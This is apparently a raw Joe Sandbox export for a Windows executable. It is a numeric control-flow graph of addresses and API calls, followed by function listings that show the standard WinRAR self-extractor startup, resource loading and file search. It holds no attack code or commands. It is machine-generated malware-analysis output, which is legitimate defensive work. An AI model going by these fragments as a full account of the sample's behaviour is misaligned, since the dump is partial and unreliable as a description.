24516->23760 24517->24516 24519 f1b583 GetMessageW 24518->24519 24520 f1b5bc GetDlgItem 24518->24520 24521 f1b599 IsDialogMessageW 24519->24521 24522 f1b5a8 TranslateMessage DispatchMessageW 24519->24522 24520->23770 24520->23773 24521->24520 24521->24522 24522->24520 24523 f013e1 84 API calls 2 library calls 25327 f194e0 GetClientRect 25363 f121e0 26 API calls std::bad_exception::bad_exception 25387 f1f2e0 46 API calls __RTC_Initialize 25388 f2bee0 GetCommandLineA GetCommandLineW 24525 f1eae7 24526 f1eaf1 24525->24526 24529 f1e85d 24526->24529 24555 f1e5bb 24529->24555 24531 f1e86d 24532 f1e8ca 24531->24532 24543 f1e8ee 24531->24543 24533 f1e7fb DloadReleaseSectionWriteAccess 6 API calls 24532->24533 24534 f1e8d5 RaiseException 24533->24534 24535 f1eac3 24534->24535 24536 f1e966 LoadLibraryExA 24537 f1e9c7 24536->24537 24538 f1e979 GetLastError 24536->24538 24542 f1e9d9 24537->24542 24544 f1e9d2 FreeLibrary 24537->24544 24539 f1e9a2 24538->24539 24540 f1e98c 24538->24540 24545 f1e7fb DloadReleaseSectionWriteAccess 6 API calls 24539->24545 24540->24537 24540->24539 24541 f1ea37 GetProcAddress 24546 f1ea47 GetLastError 24541->24546 24551 f1ea95 24541->24551 24542->24541 24542->24551 24543->24536 24543->24537 24543->24542 24543->24551 24544->24542 24547 f1e9ad RaiseException 24545->24547 24548 f1ea5a 24546->24548 24547->24535 24550 f1e7fb DloadReleaseSectionWriteAccess 6 API calls 24548->24550 24548->24551 24552 f1ea7b RaiseException 24550->24552 24564 f1e7fb 24551->24564 24553 f1e5bb ___delayLoadHelper2@8 6 API calls 24552->24553 24554 f1ea92 24553->24554 24554->24551 24556 f1e5c7 24555->24556 24557 f1e5ed 24555->24557 24572 f1e664 24556->24572 24557->24531 24559 f1e5cc 24560 f1e5e8 24559->24560 24575 f1e78d 24559->24575 24580 f1e5ee GetModuleHandleW GetProcAddress GetProcAddress 24560->24580 24563 f1e836 24563->24531 24565 f1e80d 24564->24565 24566 f1e82f 24564->24566 24567 f1e664 DloadReleaseSectionWriteAccess 3 API calls 24565->24567 24566->24535 24568 f1e812 
24567->24568 24569 f1e82a 24568->24569 24570 f1e78d DloadProtectSection 3 API calls 24568->24570 24583 f1e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24569->24583 24570->24569 24581 f1e5ee GetModuleHandleW GetProcAddress GetProcAddress 24572->24581 24574 f1e669 24574->24559 24576 f1e7a2 DloadProtectSection 24575->24576 24577 f1e7a8 24576->24577 24578 f1e7dd VirtualProtect 24576->24578 24582 f1e6a3 VirtualQuery GetSystemInfo 24576->24582 24577->24560 24578->24577 24580->24563 24581->24574 24582->24578 24583->24566 25328 f1f4e7 29 API calls _abort 25364 f0f1e8 FreeLibrary 24590 f1e1d1 14 API calls ___delayLoadHelper2@8 25329 f1f4d3 20 API calls 25403 f2a3d0 21 API calls _free 25404 f32bd0 VariantClear 24594 f010d5 24599 f05abd 24594->24599 24600 f05ac7 __EH_prolog 24599->24600 24601 f0b505 84 API calls 24600->24601 24602 f05ad3 24601->24602 24606 f05cac GetCurrentProcess GetProcessAffinityMask 24602->24606 24607 f1e2d7 24609 f1e1db 24607->24609 24608 f1e85d ___delayLoadHelper2@8 14 API calls 24608->24609 24609->24608 25390 f20ada 51 API calls 2 library calls 25366 f1b5c0 100 API calls 25405 f177c0 118 API calls 25406 f1ffc0 RaiseException _com_raise_error _com_error::_com_error 24675 f1dec2 24676 f1decf 24675->24676 24677 f0e617 53 API calls 24676->24677 24678 f1dedc 24677->24678 24679 f04092 _swprintf 51 API calls 24678->24679 24680 f1def1 SetDlgItemTextW 24679->24680 24681 f1b568 5 API calls 24680->24681 24682 f1df0e 24681->24682 25391 f162ca 123 API calls __InternalCxxFrameHandler 25367 f1b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24820 f1f3b2 24821 f1f3be ___scrt_is_nonwritable_in_current_image 24820->24821 24852 f1eed7 24821->24852 24823 f1f518 24925 f1f838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 24823->24925 24824 f1f3c5 24824->24823 24827 f1f3ef 24824->24827 24826 f1f51f 24918 f27f58 24826->24918 24839 f1f42e ___scrt_is_nonwritable_in_current_image 
___scrt_release_startup_lock 24827->24839 24863 f28aed 24827->24863 24834 f1f40e 24836 f1f48f 24871 f1f953 GetStartupInfoW _abort 24836->24871 24838 f1f495 24872 f28a3e 51 API calls 24838->24872 24839->24836 24921 f27af4 38 API calls 2 library calls 24839->24921 24842 f1f49d 24873 f1df1e 24842->24873 24846 f1f4b1 24846->24826 24847 f1f4b5 24846->24847 24848 f1f4be 24847->24848 24923 f27efb 28 API calls _abort 24847->24923 24924 f1f048 12 API calls ___scrt_uninitialize_crt 24848->24924 24851 f1f4c6 24851->24834 24853 f1eee0 24852->24853 24927 f1f654 IsProcessorFeaturePresent 24853->24927 24855 f1eeec 24928 f22a5e 24855->24928 24857 f1eef5 24857->24824 24858 f1eef1 24858->24857 24936 f28977 24858->24936 24861 f1ef0c 24861->24824 24866 f28b04 24863->24866 24864 f1fbbc _ValidateLocalCookies 5 API calls 24865 f1f408 24864->24865 24865->24834 24867 f28a91 24865->24867 24866->24864 24868 f28ac0 24867->24868 24869 f1fbbc _ValidateLocalCookies 5 API calls 24868->24869 24870 f28ae9 24869->24870 24870->24839 24871->24838 24872->24842 25029 f10863 24873->25029 24877 f1df3d 25078 f1ac16 24877->25078 24879 f1df46 _abort 24880 f1df59 GetCommandLineW 24879->24880 24881 f1dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24880->24881 24882 f1df68 24880->24882 24883 f04092 _swprintf 51 API calls 24881->24883 25112 f1c5c4 83 API calls 24882->25112 24885 f1e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24883->24885 25082 f1b6dd LoadBitmapW 24885->25082 24886 f1df6e 24888 f1dfe0 24886->24888 24889 f1df76 OpenFileMappingW 24886->24889 25114 f1dbde SetEnvironmentVariableW SetEnvironmentVariableW 24888->25114 24892 f1dfd6 CloseHandle 24889->24892 24893 f1df8f MapViewOfFile 24889->24893 24892->24881 24895 f1dfa0 __InternalCxxFrameHandler 24893->24895 24896 f1dfcd UnmapViewOfFile 24893->24896 25113 f1dbde SetEnvironmentVariableW SetEnvironmentVariableW 24895->25113 24896->24892 24901 f1dfbc 24901->24896 24902 f190b7 8 API calls 24903 f1e0aa DialogBoxParamW 24902->24903 
24904 f1e0e4 24903->24904 24905 f1e0f6 Sleep 24904->24905 24906 f1e0fd 24904->24906 24905->24906 24909 f1e10b 24906->24909 25115 f1ae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 24906->25115 24908 f1e12a DeleteObject 24910 f1e146 24908->24910 24911 f1e13f DeleteObject 24908->24911 24909->24908 24912 f1e177 24910->24912 24913 f1e189 24910->24913 24911->24910 25116 f1dc3b 6 API calls 24912->25116 25109 f1ac7c 24913->25109 24916 f1e17d CloseHandle 24916->24913 24917 f1e1c3 24922 f1f993 GetModuleHandleW 24917->24922 25247 f27cd5 24918->25247 24921->24836 24922->24846 24923->24848 24924->24851 24925->24826 24927->24855 24940 f23b07 24928->24940 24931 f22a67 24931->24858 24933 f22a6f 24934 f22a7a 24933->24934 24954 f23b43 DeleteCriticalSection 24933->24954 24934->24858 24983 f2c05a 24936->24983 24939 f22a7d 7 API calls 2 library calls 24939->24857 24942 f23b10 24940->24942 24943 f23b39 24942->24943 24944 f22a63 24942->24944 24955 f23d46 24942->24955 24960 f23b43 DeleteCriticalSection 24943->24960 24944->24931 24946 f22b8c 24944->24946 24976 f23c57 24946->24976 24949 f22ba1 24949->24933 24951 f22baf 24952 f22bbc 24951->24952 24982 f22bbf 6 API calls ___vcrt_FlsFree 24951->24982 24952->24933 24954->24931 24961 f23c0d 24955->24961 24958 f23d7e InitializeCriticalSectionAndSpinCount 24959 f23d69 24958->24959 24959->24942 24960->24944 24962 f23c26 24961->24962 24966 f23c4f 24961->24966 24962->24966 24968 f23b72 24962->24968 24965 f23c3b GetProcAddress 24965->24966 24967 f23c49 24965->24967 24966->24958 24966->24959 24967->24966 24974 f23b7e ___vcrt_FlsFree 24968->24974 24969 f23bf3 24969->24965 24969->24966 24970 f23b95 LoadLibraryExW 24971 f23bb3 GetLastError 24970->24971 24972 f23bfa 24970->24972 24971->24974 24972->24969 24973 f23c02 FreeLibrary 24972->24973 24973->24969 24974->24969 24974->24970 24975 f23bd5 LoadLibraryExW 24974->24975 24975->24972 24975->24974 24977 f23c0d ___vcrt_FlsFree 5 API calls 24976->24977 24978 f23c71 24977->24978 24979 f23c8a TlsAlloc 
24978->24979 24980 f22b96 24978->24980 24980->24949 24981 f23d08 6 API calls ___vcrt_FlsFree 24980->24981 24981->24951 24982->24949 24986 f2c073 24983->24986 24987 f2c077 24983->24987 24984 f1fbbc _ValidateLocalCookies 5 API calls 24985 f1eefe 24984->24985 24985->24861 24985->24939 24986->24984 24987->24986 24989 f2a6a0 24987->24989 24990 f2a6ac ___scrt_is_nonwritable_in_current_image 24989->24990 25001 f2ac31 EnterCriticalSection 24990->25001 24992 f2a6b3 25002 f2c528 24992->25002 24994 f2a6c2 24995 f2a6d1 24994->24995 25015 f2a529 29 API calls 24994->25015 25017 f2a6ed LeaveCriticalSection _abort 24995->25017 24998 f2a6cc 25016 f2a5df GetStdHandle GetFileType 24998->25016 24999 f2a6e2 _abort 24999->24987 25001->24992 25003 f2c534 ___scrt_is_nonwritable_in_current_image 25002->25003 25004 f2c541 25003->25004 25005 f2c558 25003->25005 25026 f291a8 20 API calls _free 25004->25026 25018 f2ac31 EnterCriticalSection 25005->25018 25008 f2c546 25027 f29087 26 API calls ___std_exception_copy 25008->25027 25010 f2c550 _abort 25010->24994 25013 f2c590 25028 f2c5b7 LeaveCriticalSection _abort 25013->25028 25014 f2c564 25014->25013 25019 f2c479 25014->25019 25015->24998 25016->24995 25017->24999 25018->25014 25020 f2b136 _free 20 API calls 25019->25020 25021 f2c48b 25020->25021 25024 f2af0a 11 API calls 25021->25024 25025 f2c498 25021->25025 25022 f28dcc _free 20 API calls 25023 f2c4ea 25022->25023 25023->25014 25024->25021 25025->25022 25026->25008 25027->25010 25028->25010 25030 f1ec50 25029->25030 25031 f1086d GetModuleHandleW 25030->25031 25032 f108e7 25031->25032 25033 f10888 GetProcAddress 25031->25033 25036 f10c14 GetModuleFileNameW 25032->25036 25126 f275fb 42 API calls __vsnwprintf_l 25032->25126 25034 f108a1 25033->25034 25035 f108b9 GetProcAddress 25033->25035 25034->25035 25037 f108cb 25035->25037 25045 f10c32 25036->25045 25037->25032 25039 f10b54 25039->25036 25040 f10b5f GetModuleFileNameW CreateFileW 25039->25040 25041 f10c08 CloseHandle 25040->25041 25042 
f10b8f SetFilePointer 25040->25042 25041->25036 25042->25041 25043 f10b9d ReadFile 25042->25043 25043->25041 25047 f10bbb 25043->25047 25048 f10c94 GetFileAttributesW 25045->25048 25050 f10c5d CompareStringW 25045->25050 25051 f10cac 25045->25051 25117 f0b146 25045->25117 25120 f1081b 25045->25120 25047->25041 25049 f1081b 2 API calls 25047->25049 25048->25045 25048->25051 25049->25047 25050->25045 25052 f10cb7 25051->25052 25055 f10cec 25051->25055 25054 f10cd0 GetFileAttributesW 25052->25054 25056 f10ce8 25052->25056 25053 f10dfb 25077 f1a64d GetCurrentDirectoryW 25053->25077 25054->25052 25054->25056 25055->25053 25057 f0b146 GetVersionExW 25055->25057 25056->25055 25058 f10d06 25057->25058 25059 f10d73 25058->25059 25060 f10d0d 25058->25060 25061 f04092 _swprintf 51 API calls 25059->25061 25062 f1081b 2 API calls 25060->25062 25063 f10d9b AllocConsole 25061->25063 25064 f10d17 25062->25064 25065 f10df3 ExitProcess 25063->25065 25066 f10da8 GetCurrentProcessId AttachConsole 25063->25066 25067 f1081b 2 API calls 25064->25067 25127 f23e13 25066->25127 25069 f10d21 25067->25069 25071 f0e617 53 API calls 25069->25071 25070 f10dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25070->25065 25072 f10d3c 25071->25072 25073 f04092 _swprintf 51 API calls 25072->25073 25074 f10d4f 25073->25074 25075 f0e617 53 API calls 25074->25075 25076 f10d5e 25075->25076 25076->25065 25077->24877 25079 f1081b 2 API calls 25078->25079 25080 f1ac2a OleInitialize 25079->25080 25081 f1ac4d GdiplusStartup SHGetMalloc 25080->25081 25081->24879 25083 f1b70b GetObjectW 25082->25083 25084 f1b6fe 25082->25084 25088 f1b71a 25083->25088 25129 f1a6c2 FindResourceW 25084->25129 25087 f1a5c6 4 API calls 25089 f1b72d 25087->25089 25088->25087 25090 f1b770 25089->25090 25091 f1b74c 25089->25091 25093 f1a6c2 13 API calls 25089->25093 25101 f0da42 25090->25101 25145 f1a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25091->25145 25095 f1b73d 25093->25095 25094 f1b754 25146 f1a5e4 GetDC GetDeviceCaps 
GetDeviceCaps ReleaseDC 25094->25146 25095->25091 25097 f1b743 DeleteObject 25095->25097 25097->25091 25098 f1b75d 25147 f1a80c 8 API calls 25098->25147 25100 f1b764 DeleteObject 25100->25090 25156 f0da67 25101->25156 25106 f190b7 25107 f1eb38 8 API calls 25106->25107 25108 f190d6 25107->25108 25108->24902 25110 f1acab GdiplusShutdown CoUninitialize 25109->25110 25110->24917 25112->24886 25113->24901 25114->24881 25115->24909 25116->24916 25118 f0b196 25117->25118 25119 f0b15a GetVersionExW 25117->25119 25118->25045 25119->25118 25121 f1ec50 25120->25121 25122 f10828 GetSystemDirectoryW 25121->25122 25123 f10840 25122->25123 25124 f1085e 25122->25124 25125 f10851 LoadLibraryW 25123->25125 25124->25045 25125->25124 25126->25039 25128 f23e1b 25127->25128 25128->25070 25128->25128 25130 f1a6e5 SizeofResource 25129->25130 25131 f1a7d3 25129->25131 25130->25131 25132 f1a6fc LoadResource 25130->25132 25131->25083 25131->25088 25132->25131 25133 f1a711 LockResource 25132->25133 25133->25131 25134 f1a722 GlobalAlloc 25133->25134 25134->25131 25135 f1a73d GlobalLock 25134->25135 25136 f1a7cc GlobalFree 25135->25136 25137 f1a74c __InternalCxxFrameHandler 25135->25137 25136->25131 25138 f1a754 CreateStreamOnHGlobal 25137->25138 25139 f1a7c5 GlobalUnlock 25138->25139 25140 f1a76c 25138->25140 25139->25136 25148 f1a626 GdipAlloc 25140->25148 25143 f1a7b0 25143->25139 25144 f1a79a GdipCreateHBITMAPFromBitmap 25144->25143 25145->25094 25146->25098 25147->25100 25149 f1a645 25148->25149 25150 f1a638 25148->25150 25149->25139 25149->25143 25149->25144 25152 f1a3b9 25150->25152 25153 f1a3e1 GdipCreateBitmapFromStream 25152->25153 25154 f1a3da GdipCreateBitmapFromStreamICM 25152->25154 25155 f1a3e6 25153->25155 25154->25155 25155->25149 25157 f0da75 __EH_prolog 25156->25157 25158 f0daa4 GetModuleFileNameW 25157->25158 25159 f0dad5 25157->25159 25160 f0dabe 25158->25160 25202 f098e0 25159->25202 25160->25159 25162 f0959a 80 API calls 25164 f0da4e 25162->25164 25163 f0db31 25213 f26310 
25163->25213 25200 f0e29e GetModuleHandleW FindResourceW 25164->25200 25166 f0e261 78 API calls 25167 f0db05 25166->25167 25167->25163 25167->25166 25194 f0dd4a 25167->25194 25168 f0db44 25169 f26310 26 API calls 25168->25169 25177 f0db56 ___vcrt_FlsFree 25169->25177 25170 f0dc85 25170->25194 25233 f09d70 81 API calls 25170->25233 25172 f09e80 79 API calls 25172->25177 25174 f0dc9f ___std_exception_copy 25175 f09bd0 82 API calls 25174->25175 25174->25194 25176 f0dcc8 ___std_exception_copy 25175->25176 25176->25194 25197 f0dcd3 _wcslen ___std_exception_copy ___vcrt_FlsFree 25176->25197 25234 f11b84 MultiByteToWideChar 25176->25234 25177->25170 25177->25172 25177->25194 25227 f09bd0 25177->25227 25232 f09d70 81 API calls 25177->25232 25180 f0e159 25185 f0e1de 25180->25185 25240 f28cce 26 API calls ___std_exception_copy 25180->25240 25182 f0e16e 25241 f27625 26 API calls ___std_exception_copy 25182->25241 25184 f0e214 25190 f26310 26 API calls 25184->25190 25185->25184 25189 f0e261 78 API calls 25185->25189 25187 f0e1c6 25242 f0e27c 78 API calls 25187->25242 25189->25185 25191 f0e22d 25190->25191 25192 f26310 26 API calls 25191->25192 25192->25194 25194->25162 25195 f11da7 WideCharToMultiByte 25195->25197 25197->25180 25197->25194 25197->25195 25235 f0e5b1 50 API calls __vsnprintf 25197->25235 25236 f26159 26 API calls 3 library calls 25197->25236 25237 f28cce 26 API calls ___std_exception_copy 25197->25237 25238 f27625 26 API calls ___std_exception_copy 25197->25238 25239 f0e27c 78 API calls 25197->25239 25201 f0da55 25200->25201 25201->25106 25203 f098ea 25202->25203 25204 f0994b CreateFileW 25203->25204 25205 f0996c GetLastError 25204->25205 25209 f099bb 25204->25209 25206 f0bb03 GetCurrentDirectoryW 25205->25206 25207 f0998c 25206->25207 25208 f09990 CreateFileW GetLastError 25207->25208 25207->25209 25208->25209 25211 f099b5 25208->25211 25210 f099ff 25209->25210 25212 f099e5 SetFileTime 25209->25212 25210->25167 25211->25209 25212->25210 25214 f26349 

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00F10863: GetModuleHandleW.KERNEL32(kernel32), ref: 00F1087C
                                                                            • Part of subcall function 00F10863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00F1088E
                                                                            • Part of subcall function 00F10863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00F108BF
                                                                            • Part of subcall function 00F1A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00F1A655
                                                                            • Part of subcall function 00F1AC16: OleInitialize.OLE32(00000000), ref: 00F1AC2F
                                                                            • Part of subcall function 00F1AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00F1AC66
                                                                            • Part of subcall function 00F1AC16: SHGetMalloc.SHELL32(00F48438), ref: 00F1AC70
                                                                          • GetCommandLineW.KERNEL32 ref: 00F1DF5C
                                                                          • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00F1DF83
                                                                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00F1DF94
                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 00F1DFCE
                                                                            • Part of subcall function 00F1DBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00F1DBF4
                                                                            • Part of subcall function 00F1DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00F1DC30
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00F1DFD7
                                                                          • GetModuleFileNameW.KERNEL32(00000000,00F5EC90,00000800), ref: 00F1DFF2
                                                                          • SetEnvironmentVariableW.KERNEL32(sfxname,00F5EC90), ref: 00F1DFFE
                                                                          • GetLocalTime.KERNEL32(?), ref: 00F1E009
                                                                          • _swprintf.LIBCMT ref: 00F1E048
                                                                          • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00F1E05A
                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00F1E061
                                                                          • LoadIconW.USER32(00000000,00000064), ref: 00F1E078
                                                                          • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00F1E0C9
                                                                          • Sleep.KERNEL32(?), ref: 00F1E0F7
                                                                          • DeleteObject.GDI32 ref: 00F1E130
                                                                          • DeleteObject.GDI32(?), ref: 00F1E140
                                                                          • CloseHandle.KERNEL32 ref: 00F1E183
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                          • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                          • API String ID: 3049964643-3743209390
                                                                          • Opcode ID: 8592d2e288421d570939186105f6e053e45faad652de7f1886b84f4d93cfb62b
                                                                          • Instruction ID: d1613b7951928d3f270e7d8b923ddf746c2e2e84f9c6d711fad86eb3469a9caf
                                                                          • Opcode Fuzzy Hash: 8592d2e288421d570939186105f6e053e45faad652de7f1886b84f4d93cfb62b
                                                                          • Instruction Fuzzy Hash: 30610871904309BFD320EB74EC49FAB37ADAB45725F000429FD45921A1DBB8DA88F762

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00F1B73D,00000066), ref: 00F1A6D5
                                                                          • SizeofResource.KERNEL32(00000000,?,?,?,00F1B73D,00000066), ref: 00F1A6EC
                                                                          • LoadResource.KERNEL32(00000000,?,?,?,00F1B73D,00000066), ref: 00F1A703
                                                                          • LockResource.KERNEL32(00000000,?,?,?,00F1B73D,00000066), ref: 00F1A712
                                                                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00F1B73D,00000066), ref: 00F1A72D
                                                                          • GlobalLock.KERNEL32(00000000), ref: 00F1A73E
                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00F1A762
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00F1A7C6
                                                                            • Part of subcall function 00F1A626: GdipAlloc.GDIPLUS(00000010), ref: 00F1A62C
                                                                          • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00F1A7A7
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00F1A7CD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                          • String ID: PNG
                                                                          • API String ID: 211097158-364855578
                                                                          • Opcode ID: f3fded4b44814e6777a35a08240033cfeaa1761b9754eb8cddfe4f0a80fe5815
                                                                          • Instruction ID: abdc9b9155ffe58653088bd7c807cfaaf076583b511b8b06e2cc6e1fd1da18b1
                                                                          • Opcode Fuzzy Hash: f3fded4b44814e6777a35a08240033cfeaa1761b9754eb8cddfe4f0a80fe5815
                                                                          • Instruction Fuzzy Hash: AA318F75A0130AAFD7109F21EC88D6B7BB9FF85771B040619F815C2261EB31DE84BAA1

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00F0A592,000000FF,?,?), ref: 00F0A6C4
                                                                            • Part of subcall function 00F0BB03: _wcslen.LIBCMT ref: 00F0BB27
                                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00F0A592,000000FF,?,?), ref: 00F0A6F2
                                                                          • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00F0A592,000000FF,?,?), ref: 00F0A6FE
                                                                          • FindNextFileW.KERNEL32(?,?,?,?,?,?,00F0A592,000000FF,?,?), ref: 00F0A728
                                                                          • GetLastError.KERNEL32(?,?,?,?,00F0A592,000000FF,?,?), ref: 00F0A734
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                          • String ID:
                                                                          • API String ID: 42610566-0
                                                                          • Opcode ID: 39736099921e1e735e50b50e3959516c0501f02150539882f95e127b782b3727
                                                                          • Instruction ID: b7d34a5a8e574c6234151602d8af81b2322c70ef53ea9a51175792bab20623e5
                                                                          • Opcode Fuzzy Hash: 39736099921e1e735e50b50e3959516c0501f02150539882f95e127b782b3727
                                                                          • Instruction Fuzzy Hash: D3416172900619ABCB29DF68CC84AE9B7B9FB48360F144196F95DE3240D7346ED4EF90
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000000,?,00F27DC4,00000000,00F3C300,0000000C,00F27F1B,00000000,00000002,00000000), ref: 00F27E0F
                                                                          • TerminateProcess.KERNEL32(00000000,?,00F27DC4,00000000,00F3C300,0000000C,00F27F1B,00000000,00000002,00000000), ref: 00F27E16
                                                                          • ExitProcess.KERNEL32 ref: 00F27E28
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentExitTerminate
                                                                          • String ID:
                                                                          • API String ID: 1703294689-0
                                                                          • Opcode ID: 2727199607fa852163003c0b21e51dfc890155106ab98d34777872f301893d2a
                                                                          • Instruction ID: 0feab06cc88a153c8a685ae5843b80207133d4b9aa576a4cea1606d79878a340
                                                                          • Opcode Fuzzy Hash: 2727199607fa852163003c0b21e51dfc890155106ab98d34777872f301893d2a
                                                                          • Instruction Fuzzy Hash: 8FE04F31400658EBCF01BF50ED099493F6AEB00361B014454F8058A132CB35DE51FA90
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID:
                                                                          • API String ID: 3519838083-0
                                                                          • Opcode ID: f43d68e9dd4ac5c18b38eac0f9adb40cf2c5ba6475994696d7237d2a22d44daf
